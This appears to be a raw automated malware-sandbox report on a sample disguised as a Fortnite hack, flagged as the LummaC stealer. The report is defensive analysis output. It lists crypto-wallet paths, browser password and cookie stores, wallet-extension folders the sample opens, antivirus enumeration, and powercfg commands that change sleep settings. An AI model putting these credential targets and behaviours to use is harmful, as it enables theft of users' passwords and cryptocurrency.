Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00F0F048
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00F0B007
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00F0F299
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00F0F334
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,	0_2_00F0AB0C
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,	0_2_00F0F5E6
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00F0F587
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00F0F6BB
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00F0F7AD
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,	0_2_00F0F706
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,	2_2_00F0F8B3
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00F0F048
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00F0B007
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00F0F299
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00F0F334
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,	2_2_00F0AB0C
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,	2_2_00F0F5E6
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00F0F587
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00F0F6BB
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00F0F7AD
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,	2_2_00F0F706

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 0_2_00EFE6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00EFE6D7

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: FortniteHack.exe1.exe, 00000002.00000002.2434148288.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335692308.0000000000C0A000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335607572.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: FortniteHack.exe1.exe PID: 6908, type: MEMORYSTR
Source: Yara match	File source: 2.2.FortniteHack.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.FortniteHack.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2433287684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\walletsO
Source: FortniteHack.exe1.exe, 00000002.00000003.1277729158.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertyt
Source: FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: FortniteHack.exe1.exe, 00000002.00000003.2023753844.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: FortniteHack.exe1.exe, 00000002.00000002.2434319140.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
